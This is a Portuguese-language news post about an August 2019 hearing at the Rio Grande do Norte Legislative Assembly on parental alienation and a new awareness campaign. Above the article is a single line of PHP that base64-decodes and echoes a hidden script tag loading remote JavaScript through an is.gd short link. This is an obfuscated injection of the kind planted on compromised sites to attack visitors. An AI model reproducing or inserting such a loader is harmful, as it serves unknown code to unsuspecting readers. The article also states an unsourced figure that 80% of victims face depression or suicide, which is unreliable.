$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Especialistas alertam para efeitos da alienação parental em crianças e adolescentes

Especialistas alertam para efeitos da alienação parental em crianças e adolescentes
17 Ago 2019

Depressão, automutilação, baixa autoestima, transtorno de ansiedade, crises de pânico, uso excessivo de drogas e álcool. Essas e outras consequências são comuns quando a separação dos pais, um processo geralmente doloroso para todas as partes, vem acompanhada de algo ainda mais grave e, infelizmente, bastante comum em nossos dias: a alienação parental, tema debatido nesta sexta-feira (16), em audiência pública pela Assembleia Legislativa do Rio Grande do Norte, numa iniciativa do presidente da Casa, deputado Ezequiel Ferreira (PSDB), que marcou também o lançamento da campanha publicitária sobre o tema.

Especialistas de diversas áreas: Psicologia, Direito, Assistência Social, entre outras, foram convidados a debater essa interferência na formação psicológica da criança ou adolescente, que é provocada por um dos pais ou parentes que os tenham sob sua guarda. O problema já afeta, no mundo, mais de 20 milhões de crianças e adolescentes. No Estado, 80% das vítimas são atingidas pela depressão e até suicídio.

“Entrarmos neste debate parece algo simbólico, mas não é. Teremos efetiva participação neste tema, assim como outras campanhas que já realizamos nesta Casa Legislativa em todos os âmbitos. Não ficaremos apenas restritos a uma data no calendário oficial, vamos criar aqui na Assembleia Legislativa, de forma pioneira, uma estrutura de apoio às famílias”, afirmou o presidente Ezequiel Ferreira, que anunciou, em primeira mão, a formação de uma equipe multidicisplinar, composta por psicólogos, advogados e assistentes sociais para acolher e encaminhar a população que precisa de esclarecimentos sobre o tema, contribuindo para a conciliação e mediação de conflitos.

Durante o evento, foi apresentado um conjunto de ações e projetos de leis – como a Campanha Estadual Permanente de Conscientização e o Dia Estadual de Conscientização da Alienação Parental, instituído como o dia 25 de abril.  “As pautas mais urgentes da sociedade tornaram-se uma filosofia da nossa atuação na Assembleia e nosso principal objetivo é chamar a atenção da população para um tema executado diariamente, mas pouco conhecido em sua denominação pela falta de informação ou pelos paradigmas construídos”, disse.

Os especialistas e autoridades convidados para a audiência pública enalteceram a iniciativa do Legislativo do RN. Juíza da Vara da família, Fátima Soares afirmou que a campanha vai criar um alerta e contribuir para o registro dos casos, pois ainda há uma lacuna devido à falta de conhecimento dos direitos: “Nos deparamos constantemente com esse problema e precisamos de políticas públicas, com esta audiência. Na alienação parental a criança perde a oportunidade de uma convivência harmoniosa e pacífica. O direito à felicidade e de uma convivência familiar harmoniosa faz parte da nossa dignidade”, disse. 

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *